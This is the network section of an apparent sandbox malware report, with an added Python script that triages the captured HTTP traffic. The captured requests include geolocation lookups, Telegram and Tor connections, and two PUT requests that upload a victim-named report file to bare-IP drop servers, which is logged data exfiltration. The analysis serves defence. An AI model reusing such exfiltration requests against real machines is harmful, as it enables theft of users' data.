Network Analysis
IP Address | Status | Action |
---|---|---|
104.76.70.102 | Active | Moloch |
129.151.210.129 | Active | Moloch |
138.201.197.74 | Active | Moloch |
149.154.167.220 | Active | Moloch |
159.69.63.226 | Active | Moloch |
164.124.101.2 | Active | Moloch |
167.86.115.218 | Active | Moloch |
185.189.159.121 | Active | Moloch |
208.95.112.1 | Active | Moloch |
5.181.12.94 | Active | Moloch |
61.111.58.40 | Active | Moloch |
65.21.49.163 | Active | Moloch |
89.46.80.136 | Active | Moloch |
Name | Response | Post-Analysis Lookup |
---|---|---|
x1.i.lencr.org | 104.76.70.102 | |
apps.identrust.com | CNAME a1952.dscq.akamai.net, CNAME identrust.edgesuite.net | 23.67.53.19 |
r3.i.lencr.org | 104.76.70.102 | |
api.telegram.org | 149.154.167.220 | |
archive.torproject.org | 159.69.63.226 | |
ip-api.com | 208.95.112.1 | |
TCP Requests
- 192.168.56.103:49179 -> 104.76.70.102:80 (r3.i.lencr.org)
- 192.168.56.103:49180 -> 104.76.70.102:80 (r3.i.lencr.org)
- 192.168.56.103:49175 -> 129.151.210.129:8082
- 192.168.56.103:49185 -> 129.151.210.129:8082
- 192.168.56.103:49181 -> 138.201.197.74:8080
- 192.168.56.103:49182 -> 149.154.167.220:443 (api.telegram.org)
- 192.168.56.103:49170 -> 159.69.63.226:443 (archive.torproject.org)
- 192.168.56.103:49171 -> 208.95.112.1:80 (ip-api.com)
- 192.168.56.103:49177 -> 5.181.12.94:80
- 192.168.56.103:49172 -> 61.111.58.40:80 (apps.identrust.com)
- 192.168.56.103:49178 -> 89.46.80.136:443
UDP Requests
- 192.168.56.101:137 -> 192.168.56.103:137
- 192.168.56.103:50800 -> 164.124.101.2:53
- 192.168.56.103:52760 -> 164.124.101.2:53
- 192.168.56.103:53673 -> 164.124.101.2:53
- 192.168.56.103:56613 -> 164.124.101.2:53
- 192.168.56.103:62576 -> 164.124.101.2:53
- 192.168.56.103:64894 -> 164.124.101.2:53
- 192.168.56.103:137 -> 192.168.56.255:137
- 192.168.56.103:49154 -> 239.255.255.250:1900
HTTP Requests
GET 200 http://ip-api.com/line?fields=query,country
Request:
GET /line?fields=query,country HTTP/1.1
Host: ip-api.com
Connection: Keep-Alive
Response:
HTTP/1.1 200 OK
Date: Thu, 08 Jun 2023 00:17:40 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 28
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44

GET 200 http://apps.identrust.com/roots/dstrootcax3.p7c
Request:
GET /roots/dstrootcax3.p7c HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: apps.identrust.com
Response:
HTTP/1.1 200 OK
X-XSS-Protection: 1; mode=block
Strict-Transport-Security: max-age=15768000
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Content-Security-Policy: default-src 'self' *.identrust.com
Last-Modified: Wed, 08 Feb 2023 16:52:56 GMT
ETag: "37d-5f433188daa00"
Accept-Ranges: bytes
Content-Length: 893
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
Content-Type: application/pkcs7-mime
Cache-Control: max-age=3600
Expires: Thu, 08 Jun 2023 01:17:55 GMT
Date: Thu, 08 Jun 2023 00:17:55 GMT
Connection: keep-alive
Server-Timing: ak_p; desc="1686183475709_1030699556_119142900_9_877_7_0_-";dur=1

PUT 100 http://5.181.12.94/FMARE_test22%40TEST22-PC_report.wsr
Request:
PUT /FMARE_test22%40TEST22-PC_report.wsr HTTP/1.1
Host: 5.181.12.94
Content-Length: 133738
Expect: 100-continue
Connection: Keep-Alive
Response:
HTTP/1.1 100 Continue

GET 200 http://r3.i.lencr.org/
Request:
GET / HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: r3.i.lencr.org
Response:
HTTP/1.1 200 OK
Server: nginx
Content-Type: application/pkix-cert
Last-Modified: Sat, 13 Feb 2021 01:07:28 GMT
ETag: "60272650-51a"
Unused62: 8096267
Cache-Control: max-age=3600
Expires: Thu, 08 Jun 2023 01:18:38 GMT
Date: Thu, 08 Jun 2023 00:18:38 GMT
Content-Length: 1306
Connection: keep-alive

GET 200 http://x1.i.lencr.org/
Request:
GET / HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: x1.i.lencr.org
Response:
HTTP/1.1 200 OK
Server: nginx
Content-Type: application/pkix-cert
Last-Modified: Fri, 19 Jan 2018 23:38:04 GMT
ETag: "5a62815c-56f"
Content-Disposition: attachment; filename="ISRG Root X1.der"
Cache-Control: max-age=53333
Expires: Thu, 08 Jun 2023 15:07:31 GMT
Date: Thu, 08 Jun 2023 00:18:38 GMT
Content-Length: 1391
Connection: keep-alive

PUT 100 http://138.201.197.74:8080/FMARE_test22%40TEST22-PC_report.wsr
Request:
PUT /FMARE_test22%40TEST22-PC_report.wsr HTTP/1.1
Host: 138.201.197.74:8080
Content-Length: 133738
Expect: 100-continue
Connection: Keep-Alive
Response:
HTTP/1.1 100 Continue
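The six HTTP exchanges above, triaged by an added example (my code, not part of the sandbox output). The request/response header pairs are transcribed from this report as constructed sample data; bodies were not captured. The code separates Windows CryptoAPI certificate-chain fetches (User-Agent Microsoft-CryptoAPI with pkix-cert or pkcs7-mime responses, which the Let's Encrypt R3 issuer in the TLS table explains) and the ip-api.com geolocation check from the two PUT uploads, then groups uploads by path and size so that the same 133,738-byte report.wsr body going to two bare-IP hosts stands out. The verdict labels and the bare-IP heuristic are my own choices. Only the servers' 100 Continue is in the capture, so the final status of the uploads is not known from this page.

```python
from ipaddress import ip_address
from urllib.parse import unquote

# Constructed sample: header pairs transcribed from this report (bodies not captured).
CAPTURED_HTTP = [
    ("GET /line?fields=query,country HTTP/1.1\r\nHost: ip-api.com\r\nConnection: Keep-Alive\r\n\r\n",
     "HTTP/1.1 200 OK\r\nContent-Type: text/plain; charset=utf-8\r\nContent-Length: 28\r\n\r\n"),
    ("GET /roots/dstrootcax3.p7c HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\n"
     "User-Agent: Microsoft-CryptoAPI/6.1\r\nHost: apps.identrust.com\r\n\r\n",
     "HTTP/1.1 200 OK\r\nContent-Type: application/pkcs7-mime\r\nContent-Length: 893\r\n\r\n"),
    ("PUT /FMARE_test22%40TEST22-PC_report.wsr HTTP/1.1\r\nHost: 5.181.12.94\r\n"
     "Content-Length: 133738\r\nExpect: 100-continue\r\nConnection: Keep-Alive\r\n\r\n",
     "HTTP/1.1 100 Continue\r\n\r\n"),
    ("GET / HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\n"
     "User-Agent: Microsoft-CryptoAPI/6.1\r\nHost: r3.i.lencr.org\r\n\r\n",
     "HTTP/1.1 200 OK\r\nServer: nginx\r\nContent-Type: application/pkix-cert\r\nContent-Length: 1306\r\n\r\n"),
    ("GET / HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\n"
     "User-Agent: Microsoft-CryptoAPI/6.1\r\nHost: x1.i.lencr.org\r\n\r\n",
     "HTTP/1.1 200 OK\r\nServer: nginx\r\nContent-Type: application/pkix-cert\r\nContent-Length: 1391\r\n\r\n"),
    ("PUT /FMARE_test22%40TEST22-PC_report.wsr HTTP/1.1\r\nHost: 138.201.197.74:8080\r\n"
     "Content-Length: 133738\r\nExpect: 100-continue\r\nConnection: Keep-Alive\r\n\r\n",
     "HTTP/1.1 100 Continue\r\n\r\n"),
]

CERT_TYPES = ("application/pkix-cert", "application/pkcs7-mime")


def parse_headers(raw):
    """Split a raw HTTP message into (start line, {lower-cased header name: value})."""
    head = raw.partition("\r\n\r\n")[0]
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def host_is_bare_ip(host):
    """True when the Host header is a literal IPv4 address, with or without :port."""
    hostname = host.rsplit(":", 1)[0] if host.count(":") == 1 else host
    try:
        ip_address(hostname)
        return True
    except ValueError:
        return False


def classify(request, response):
    """Assign one verdict (my labels) to a request/response pair."""
    start, req_h = parse_headers(request)
    status_line, resp_h = parse_headers(response)
    method, path, _ = start.split(" ", 2)
    host = req_h.get("host", "")
    ua = req_h.get("user-agent", "")
    ctype = resp_h.get("content-type", "")
    length = int(req_h.get("content-length", 0))
    record = {
        "method": method, "host": host, "path": path,
        "filename": unquote(path.rsplit("/", 1)[-1]),   # reveals user@host naming
        "status": status_line.split(" ")[1], "upload_bytes": length,
    }
    if ua.startswith("Microsoft-CryptoAPI/") and ctype in CERT_TYPES:
        record["verdict"] = "cert-chain-fetch"      # Windows building a chain via AIA
    elif host == "ip-api.com":
        record["verdict"] = "geolocation-check"
    elif method in ("PUT", "POST") and length > 0 and host_is_bare_ip(host):
        record["verdict"] = "upload-to-bare-ip"
    else:
        record["verdict"] = "unclassified"
    return record


def triage(captured):
    return [classify(req, resp) for req, resp in captured]


def uploads(records):
    """Group uploads by (path, size): one body sent to several hosts suggests redundant drop servers."""
    groups = {}
    for r in records:
        if r["verdict"] == "upload-to-bare-ip":
            groups.setdefault((r["path"], r["upload_bytes"]), []).append(r["host"])
    return groups
```

The bare-IP check only handles IPv4 literals; a bracketed IPv6 Host header would need its own parsing. Decoding the path shows the upload is named after the sandbox user and machine (FMARE_test22@TEST22-PC), which is worth searching for across other samples.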
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLS 1.2 192.168.56.103:49170 -> 159.69.63.226:443 | C=US, O=Let's Encrypt, CN=R3 | CN=archive.torproject.org | 46:76:9d:7a:fb:c3:cf:f3:94:13:39:40:2e:98:0c:2a:7a:3a:ff:f1 |
TLS 1.2 192.168.56.103:49178 -> 89.46.80.136:443 | C=US, O=Let's Encrypt, CN=R3 | CN=transfer.fragnet.gg | 14:fc:1d:17:5c:4b:36:16:b0:e2:f4:bc:bb:3f:64:68:ee:dc:39:ab |
Snort Alerts
No Snort Alerts